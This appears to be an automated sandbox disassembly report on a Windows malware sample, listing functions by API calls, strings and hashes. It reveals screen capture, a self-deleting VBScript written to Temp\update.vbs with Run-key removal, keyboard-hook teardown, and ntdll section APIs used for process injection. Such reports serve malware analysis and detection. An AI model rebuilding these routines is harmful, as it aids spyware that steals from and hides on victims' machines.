                                              • API ID: ErrorLast$InfoLocale_abort_free
                                              • String ID:
                                              • API String ID: 2692324296-0
                                              • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                              • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                              • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                              • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                              • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                              • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                              • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                              • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                              • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                              • Instruction Fuzzy Hash:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              • API String ID: 0-2435473048
                                              • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                              • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                              • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                              • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              • API String ID: 0-2435473048
                                              • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                              • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                              • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                              • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                              • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                              • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                              • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                              • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                              • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                              • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                              • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                              • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                              • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                              • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                              • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                              • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                              • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                              • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                              • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                              • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                              • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                              • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                              • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                              • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                              • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                              • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                              • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                              • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                              • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                              • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                              • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                              • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                              • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                              • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                              APIs
                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                              • DeleteDC.GDI32(00000000), ref: 00418F65
                                              • DeleteDC.GDI32(00000000), ref: 00418F68
                                              • DeleteObject.GDI32(00000000), ref: 00418F6B
                                              • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                              • DeleteDC.GDI32(00000000), ref: 00418F9D
                                              • DeleteDC.GDI32(00000000), ref: 00418FA0
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                              • GetCursorInfo.USER32(?), ref: 00418FE2
                                              • GetIconInfo.USER32(?,?), ref: 00418FF8
                                              • DeleteObject.GDI32(?), ref: 00419027
                                              • DeleteObject.GDI32(?), ref: 00419034
                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                              • DeleteDC.GDI32(?), ref: 004191B7
                                              • DeleteDC.GDI32(00000000), ref: 004191BA
                                              • DeleteObject.GDI32(00000000), ref: 004191BD
                                              • GlobalFree.KERNEL32(?), ref: 004191C8
                                              • DeleteObject.GDI32(00000000), ref: 0041927C
                                              • GlobalFree.KERNEL32(?), ref: 00419283
                                              • DeleteDC.GDI32(?), ref: 00419293
                                              • DeleteDC.GDI32(00000000), ref: 0041929E
                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                              • String ID: DISPLAY
                                              • API String ID: 4256916514-865373369
                                              • Opcode ID: 2247b608c21a3b8abac63767662b5221d2e7e1e487ff91865d3b7fb692dc0e69
                                              • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                              • Opcode Fuzzy Hash: 2247b608c21a3b8abac63767662b5221d2e7e1e487ff91865d3b7fb692dc0e69
                                              • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                              APIs
                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,8)[,004752F0,?,pth_unenc), ref: 0040B8F6
                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                              • ExitProcess.KERNEL32 ref: 0040D80B
                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: """, 0$")$0C[$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$xdF$xpF
                                              • API String ID: 1861856835-2250399612
                                              • Opcode ID: 779bd8c3fa979e6212a70a7ec10a956c9f97f6caeed947a2cb61efc57b251fae
                                              • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                              • Opcode Fuzzy Hash: 779bd8c3fa979e6212a70a7ec10a956c9f97f6caeed947a2cb61efc57b251fae
                                              • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                              APIs
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                              • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                              • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                              • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
